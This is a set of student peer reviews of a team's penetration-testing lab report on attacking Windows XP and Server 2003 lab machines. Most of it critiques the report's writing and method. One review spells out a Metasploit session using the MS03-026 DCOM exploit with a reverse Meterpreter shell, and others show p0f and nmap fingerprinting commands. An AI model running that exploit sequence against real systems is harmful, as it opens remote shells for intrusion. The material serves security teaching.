The methodologies section starts out with the group’s assessment of the security level of the versions of Windows they were going to test. XP SP0 was an obvious easy target, but Server 2003 was classified as less secure than XP SP3 with little reason given beyond speculation about the number of services that would be running on Server 2003. The operating system identification using passive reconnaissance tools was described with little detail, using a tool called “p0f.” A link wasn’t provided, so more information couldn’t be researched, but I suspect that the tool uses active reconnaissance to fingerprint the target OS. The group gave some details about their testing but missed some key details. Various exploits from Metasploit were tried, but which ones? The group appears to have taken the same approach to each system, which failed consistently. Sufficient research would have turned up a few sites with step-by-step instructions for compromising an XP SP0 machine using Metasploit. When attempting the Server 2003 machine, the group attempted to exploit ports 21, 135, 137, and 445, though they don’t give any detail on how they attempted to exploit them.
The findings section is a bit confusing. At first look, it appears to be a summary of the methodologies, but while the methodologies make it sound like the XP SP0 machine was never compromised, the group says that they did compromise it using EZpwn. Also, the group mentions that they used Metasploit to exploit vulnerabilities in Server 2003 but that none yielded any open sessions; if a session wasn’t opened, the code injection didn’t work and the vulnerability wasn’t really exploited. The group mentions that they researched the open ports on the Server 2003 virtual machine but doesn’t mention any of the specific vulnerabilities they discovered. The group raises the issue of exploitation up the OSI stack and identifies that compromises of lower layers will exploit higher layers. One issue I had with this section of the findings is the proposed solution: the group suggests encryption at every layer. How would the system react to a compromise of the encryption at one of the layers? Encryption can only do so much, and there must be trust between the layers that the lower layers have done their job. How would, for example, layer five understand that the IPsec policy at layer three had been compromised? Layer five doesn’t “speak” IP or IPsec; it trusts layer three to do that.
I do not agree with the first few sentences of this team’s abstract. You do not need to get help to attack a target, and you do not need knowledge of the tools and how they work; someone can just get their hands on the tools and start randomly attacking systems. Knowledge is not needed at all. Break up the paragraphs; that way you would meet the required length of the abstract as per the requirements given to us. The literature review reads like a list. Compare and contrast the articles: don’t just state your point; cite it and state how it relates to the lab experiment. It is quite obvious that this lab report was written by multiple people. BREAK UP your paragraphs; having one long paragraph makes it very difficult for the reader to keep reading and not lose interest. For having a lot of information from the articles, there are not many citations, and these are needed, especially when taking material from the articles. Having no date for an article is never an option; use the Internet to find this information. Your team is the only one that has no dates for its articles.
The literature review is way too long; it is easily over the word count, and too much of the lab report is the literature review. Why does the team think that SP0 will be the easiest to compromise while SP3 will be the hardest? I question how they could come up with that statement, especially when the team states that neither group member has done this before. Most of the teams did not have experience with penetration testing, but they were still able to perform the lab experiment; the purpose of these labs is to teach the teams how to perform penetration testing. The team needed to go into more detail as to why they believe that exploiting the lower layers would make the next layer up more vulnerable. The lack of time should not be an issue: all teams had the same amount of time to perform the lab experiment, and they were able to get it done. This team, like others, is disappointed that the exploits did not work in some of their environments. Failure is always an option. These labs should be teaching the teams how to perform penetration testing and how to protect systems properly.
Team 4 began their lab report with an abstract introducing this lab assignment. They state that their objective for this lab is to use tools to determine the vulnerabilities of a target system, and then use tools to try to penetrate the target system.
Team 4 begins their literature review section by discussing Mobile Test: a Tool Supporting Automatic Black Box Tests for Software on Mobile Devices. They related the layer design of Mobile Test to the layer design we have been using to classify vulnerabilities by the OSI model. This seemed to be an interesting comparison.
They continue their literature review with Firewall Penetration Testing (Haeni, 1997). They discuss who should perform the testing. They state that testing should be done by “independent groups that could be trusted for integrity, experience, writhing skills and technical capabilities and not vendors or hackers”. Although I agree with this statement, they used the word “writhing” where I believe they meant to use the term “writing”. There were a few other misspellings throughout the document; however I used this as an example. They proceed with the types of testing and the steps involved in testing. They related these types of testing and steps involved to our current laboratory assignment.
Next, team 4 discussed Ethical Hacking and Password Cracking: a Pattern for Individualized Security Exercises (Snyder, 2006). They discussed how passwords can be hashed by algorithms such as SHA-1. They also discussed password cracking programs such as John the Ripper. I believe that they did find a misstatement by the author of this article, “If the password is easily guessed, the password is secure.” It would seem reasonable that if the password can be easily guessed, then it is not secure.
Team 4 also reviewed A Distributed Network Security Assessment Tool with Vulnerability Scan and Penetration Test (Chen, Yang, Lan, 2007). They began this review by stating, “Penetration testing relies heavily on tools to accomplish its tasks; the more tools that are available, the better the testers are at finding vulnerabilities.” I don’t necessarily agree with this statement; I believe that the knowledge of the tester is the key, not the number of tools that are available. I found it ironic that team 4 states that the article was designed to advertise a particular piece of software and that caution needs to be taken in reading the article, yet they note at the end that the author of the article does not give the name of the software or where it can be obtained. This is either very poor marketing on the part of the author of the article, or the article was meant to document their work and not meant as an advertisement.
In the methodology section, Team 4 discussed the methods that they used for conducting the testing and the results of the testing. They used p0f and Ettercap to determine the operating systems. They also used EZpwn, Fast Track, and various tools within the Metasploit framework to attempt to gain access, but had negative results. They then used Zenmap and Nessus to try to uncover any further vulnerabilities, but again had negative results. In their results section they basically restate the methods and the results that they stated in the methods section.
Team 4 did a nice job with their abstract in that it detailed what they intended to do in lab 6 and also tied this lab back to previous labs. Their literature review, however, read like a list and summary of the articles and didn’t compare and contrast the literature to the lab activities.
The methods section starts out reiterating what they discussed in their abstract. After that they explain the process they will follow to complete the lab; however, some of this information should have been in their results section. The methods section does a good job of explaining how they plan to perform their testing. Team 4 gave some details about their testing but missed some key details: several exploits from Metasploit were tried, but which ones? Team 4 failed consistently on many of their attempts but were honest enough to admit that this was due to a lack of experience. However, the purpose of these labs is to teach us how to perform penetration testing and how to protect systems properly. Hopefully team 4 will use this exercise as a learning experience and be able to apply it in the next lab exercise. Team 4 could also have gone into more detail as to why they believe that exploiting the lower layers would make the next layer up more vulnerable.
Team 4 had a great number of issues, many of them simply the time it took to install and use the selected tools. The lack of time should not be an issue; all teams had the same amount of time to perform the lab experiment, and they were able to get it done. Team 4, like others, was disappointed that their exploits did not work in some of their environments, but that is part of the learning process: figure out what went wrong, make adjustments, and try again.
The team starts with their abstract explaining what they are going to do in this week’s lab; the abstract also had a couple of sentences that repeated what had already been said. Next the team goes into the literature review. They again wrote separate reviews for each article. The first article did not have any response on how it relates to the lab or any arguments for or against it, and the second article again just gives an overview of what was discussed within the article with no relation to the lab and no discussion about it. The team continues the other articles in the same fashion. They then go on to the methodology section and explain what is going to occur in the hands-on portion of the lab. Reading through the methodologies, there were many items that belong in the results section of the lab, for example where the team discusses how long it took to exploit some of the vulnerabilities. This does not mean the team could not go into detail on what they were attempting to do, but many times it felt as if the methodology and results sections were merged. The next section was the results section. It was almost as if the team members divided the methodology and results sections between them and did not collaborate or go over the sections to refine them. There was again repetition of the same information that was discussed previously, which makes the lab hard to read and disorganized. The first paragraph of the results section would have made a good start for their conclusions rather than where it was placed. Next the team goes on to discuss the issues they had. Some of the issues were the time it took to learn to use the tools to exploit the systems. What they did not put in this section, though they talked about it earlier in the lab, was their level of experience with penetration testing; they could have included that here and taken it out of the other sections. They then give their conclusion, which goes over what happened during the lab overall. They also discuss exploits via the use of “script kiddie” tools. Yes, some of these tools do make it seem simple to exploit a system, but there are also tools that actually require knowledge of what the user is going to exploit before running the tool. When script kiddies run a tool, they do not create a plan before an attack; they simply run tools against any system. This should make the team rethink some of the terminology that gets thrown around. There is no elite creation of tools within this environment, but most of the tools used do not amount to just a point-and-click attack either. Also, if some of the tools did not work, that should have been put in the issues section along with an explanation of why: was it because the tool was coded wrong, or because of inexperience with the tools? Overall they did what they needed for the lab, but the write-up needs to be more organized.
I found a few noteworthy things concerning team four’s lab write-up. The literature review was, at the very least, quite lengthy. I must admit I find this team’s commitment to results, demonstrated by the time spent running exploits, to be admirable. Furthermore, I was intrigued by the fact that some local exploits were attempted: an interesting detail (although specifics were lacking; I assume that the ‘at’ system privilege escalation attack was employed). Finally, I agreed with the discussion of OSI layer compromise, and appreciated the reference to encryption.
It must be admitted that a fair number of problems are present with this team's report; many are somewhat trivial, but more than a few are serious. The literature review, despite its length, is flawed in style, formatting, and content. The review section was painful to read due to its 'huge' paragraph groupings. Furthermore, the use of the phrase "the author" became monotonous to the point of distraction. Continuing, despite the rather lengthy body of writing, almost nothing more than summary information was presented. Finally, very few references were actually made: the massive paragraph on the first paper made no use of citation other than to introduce the paper. This team should improve its literature review technique in the future.
Furthermore, I found it troubling that this team spent so much time defeating the Windows XP SP0 host. Admittedly, it is worthwhile to experiment with tools, but this length of time appeared to stem from difficulty cracking the machine, not from thoroughness. I would ask: did this team read other teams' prior lab exercises? I have found other teams' research nearly as valuable as my own, as it becomes a body of knowledge on which to draw when designing experimental setups. Since it was well reported that certain specific exploits were known to work against XP SP0, the approach this team took of throwing things at the host until one stuck seemed not only a waste of time but under-researched as well. I would suggest that a smart and efficient approach is the definition of professionalism: leveraging both your own prior research and that of others in the field is necessary. I would recommend that team four consider this when implementing future methods.
It is also disturbing that this team asserts that they had no real experience with the penetration tools. I ask: what did you do for the last five lab exercises? Some of those prior exercises required testing of exploits; if you did not do those exploit tests, then it seems inappropriate to raise the issue of inexperience, as it is self-inflicted. Closely related to this, the team did not really use passive methods for the first two hosts, as it is apparent that a form of active scanning was performed through repeated attempts of various exploits. Conceivably, the target would be alerted within the first few attempts: this is a far cry from a quick and effective surgical strike based on effective passive reconnaissance. In this respect, I do not believe this team really fulfilled the goals of the laboratory exercise.
Finally, I found the answers to the laboratory questions quite brief. While a few good points were raised, no evidence or logic was presented to substantiate these claims. This team asserts that "organizations are more concentrated on securing the upper layers" rather than the lower OSI layers. This is a statement that requires explanation, as I am not convinced it is universally true. For instance, in the older UNIX paradigm, there is much evidence to indicate that system administrators concern themselves mainly with the lower network layers rather than user applications. It appears that security policies may vary substantially based on the operating system deployed on the network clients.
I think that group 4's write-up for lab 6 was fair. The abstract for this lab was adequate and provided a short overview of the lab. The literature review was good and adequately reviewed the material; the group answered all of the required questions for each reading, and the citations were done well with page numbers included. For this lab, the group answered all of the required questions and provided a good amount of detail on the steps they used to attempt to exploit a system. One part that confused me read as follows: "The group also manually tried various exploits from Metasploit to try and gain access to the Windows XP SP0 operating system. This process took almost all of a day to accomplish." Almost all of the Windows exploits should work on this system; I find it hard to believe that this task should take longer than 20 minutes, including researching how to use Metasploit and finding an applicable exploit. Also, the group did not explain the passive OS findings well. They indicated that Server 2003 came up as Server 2000 SP4, which is not the same OS at all. What would happen if one were to attack a system using an exploit for one OS when it is really another? Could this raise awareness and potentially ruin all of the passive scanning done? Finally, the conclusion was adequate and summarized what was covered.
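To illustrate why I expect this to take minutes rather than a day, a minimal sketch of a Metasploit console session against an unpatched XP SP0 host follows; the module and payload names are real, but the addresses are placeholders, and I am assuming the old DCOM vulnerability only as an example, not asserting it is what the group tried.
    msfconsole
    use exploit/windows/dcerpc/ms03_026_dcom
    set RHOST 192.168.1.10
    set PAYLOAD windows/meterpreter/reverse_tcp
    set LHOST 192.168.1.5
    exploit
Against a service pack 0 target with no patches, a known-good module of this kind normally either returns a session or fails within a minute or two, so a full day suggests a methodology problem rather than a hard target.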
The team starts out with a strong abstract and provides a well-written literature review. The team used a combination of tools such as Ezpwn, FastTrack, Ettercap, and p0f to attempt to exploit their selected target machines. It seems as if the team had difficulty identifying the specific operating system using certain tools; often reading the manual that is available in BackTrack can help (type man "name of tool" in a shell). It also seems as if Ettercap gave false readings for most of your tests, which is similar to other groups' findings. Was the Metasploit Framework updated before the tests were done, or did this happen during the test? It seemed it was updated while testing the Windows XP SP3 machine. Similar to other groups, the Windows XP SP3 system was difficult to exploit, mainly because this machine is up to date with patches. The Windows XP SP0 machine seemed to be the easiest of the systems to exploit when comparing the results to the other teams'. It seems like all teams picked XP SP0, mainly because there are known exploits for this system, which is the reason for the service pack releases.
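For the passive OS identification step in particular, a minimal sketch of consulting the manual and then running p0f from a BackTrack shell is shown below; the interface name is only an example for this test network.
    man p0f
    p0f -i eth0
p0f then prints an OS guess for each host whose traffic it observes on that interface, and comparing those guesses against an active fingerprint is one way to catch the kind of false readings described above.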
Team four’s offering is generally improved over previous weeks but still could use some work.
The abstract vaguely describes the experiment. Are premade tools the only means for penetration testing? Is lab seven really about gaining access to the system, or is there more to it? If the pedagogy calls for the labs to build on each other, do you really need to mention it in the abstract?
The literature review gives exhaustive summaries of the articles that make the report painful to read. While the team makes an attempt to relate the articles back to the labs, it is cursory at best. There is little if any evaluative content, which suggests a lack of comprehension, effort, or both.
The group’s methods section contains a good amount of detail, but more specifics would make it easier to repeat. If the literature review is a mandatory section of the assignment, does it need to be mentioned in the methods section? There is data in this section that belongs in the findings. Why did it take all day to crack XP SP0? What finally worked? Why didn’t it work with Service Pack 3? Why did you attempt random ports with Server 2003? Did you attempt to fingerprint any of the systems first? Why do you think you didn’t succeed?
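On the fingerprinting question, a minimal sketch of an active check that could have been run before launching any exploits is shown below; the target address is a placeholder, and this is only one of several reasonable ways to do it.
    nmap -O -sV 192.168.1.10
The -O flag asks nmap for an operating system guess and -sV probes service versions; together they narrow the list of exploits worth attempting and would have answered several of the questions above before any attack traffic was sent.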
In your results section, you state that the team lacks penetration testing experience. This belongs in the issues section, but do you feel the other groups have an unfair advantage? Your findings give me an accurate picture of what the group was able to achieve, though there is information that really belongs in the methods section. The tools operate at the upper layers, but is that where they actually attack?
In the group’s issues section you state that a lot of time was eaten up by learning the tools. Shouldn’t you have been doing this all along? You claim a lack of knowledge as a hindrance. This is a graduate level class. You must be adaptable and learn to cover gaps in knowledge on the fly.
The group’s conclusion summarizes the methods, and states that they learned the ways of trial and error. Will the same tools that worked here always work? What about the tools that failed? Is there anything special about this environment that might have affected the outcome?